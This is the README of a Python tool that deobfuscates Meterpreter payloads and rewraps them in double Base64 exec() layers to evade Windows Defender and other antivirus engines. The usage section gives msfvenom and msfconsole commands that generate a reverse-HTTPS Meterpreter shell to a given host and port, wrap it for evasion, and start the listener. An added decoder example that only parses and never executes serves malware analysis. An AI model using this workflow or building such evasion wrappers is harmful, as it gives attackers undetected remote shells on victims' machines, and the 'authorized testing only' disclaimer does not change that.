A Python utility designed to extract, deobfuscate, and repackage Meterpreter payloads. This tool identifies encoded blobs (Zlib, Base64, or Hex) within a script, extracts the original source, and allows for the generation of a fresh, obfuscated wrapper to evade static analysis by Windows Defender and other AV engines.
- Recursive Decoding: Unpacks nested Base64, Zlib, and Hex layers automatically.
- Evasion Mode (`-m evasion`): Wraps raw code in a double Base64 layer inside `exec()` to mask signatures.
- Clean Mode (`-m clean`): Extracts raw source for analysis.
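The recursive decoding that clean mode describes, as an added example for analysts (not this repository's code): it peels nested Base64, Zlib and Hex layers and follows encoded string literals located through the AST, without ever executing the input. The function names, limits and the harmless sample wrapper are assumptions made for illustration.

```python
import ast, base64, binascii, re, zlib

MAX_DEPTH, MAX_OUT = 16, 8 << 20   # nesting limit; inflate output cap (bomb guard)
BLOB = re.compile(r"[A-Za-z0-9+/=]{32,}")   # what an encoded string literal looks like

def _inflate(data):
    d = zlib.decompressobj()
    out = d.decompress(data, MAX_OUT)
    return out if d.eof else b""   # reject truncated or oversized streams

# Hex is tried before Base64 because every hex string is also valid Base64.
DECODERS = [("zlib", _inflate), ("hex", lambda s: binascii.unhexlify(s.strip())),
            ("base64", lambda s: base64.b64decode(s.strip(), validate=True))]

def decode_once(data):
    for name, fn in DECODERS if len(data) >= 16 else []:
        try:
            out = fn(data)
        except (ValueError, zlib.error):
            continue
        if out:
            return name, out

def longest_literal(source):
    try:
        tree = ast.parse(source)   # parsed only, never executed
    except (SyntaxError, ValueError):
        return None
    found = [n.value for n in ast.walk(tree) if isinstance(n, ast.Constant)
             and isinstance(n.value, str) and BLOB.fullmatch(n.value)]
    return max(found, key=len).encode() if found else None

def peel(data):
    """Return (decoders applied, innermost bytes) for a wrapped script."""
    layers = []
    for _ in range(MAX_DEPTH):   # bare blob first, else longest literal in the source
        step = decode_once(data) or decode_once(longest_literal(data) or b"")
        if step is None:
            break
        layers.append(step[0])
        data = step[1]
    return layers, data

SAMPLE_SRC = b'print("constructed sample, not a payload")\n'   # constructed, harmless
def build_sample():   # constructed stand-in for a wrapped script
    inner = b"exec(__import__('zlib').decompress(__import__('base64').b64decode('%s')))" % base64.b64encode(zlib.compress(SAMPLE_SRC))
    return b"import base64;exec(base64.b64decode(base64.b64decode('%s')))" % base64.b64encode(base64.b64encode(inner))

if __name__ == "__main__":
    print(peel(build_sample()))
```

The decoder stops when no layer applies, so a final plaintext that happens to be pure Base64 or hex characters would be decoded one step too far; review the reported layer list alongside the output.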
Clone the repository:

```bash
git clone https://github.com/Pwn3rx0/Py-Evasion.git
cd Py-Evasion
```

No external dependencies are required (uses standard Python libraries).
```bash
msfvenom -p python/meterpreter_reverse_https lhost=192.168.1.6 lport=4444 -o payload.py
python3 PyEvasion.py -i payload.py -o evade.py -m evasion
msfconsole -r listener.rc
```

For educational and authorized security testing only. Misuse is illegal.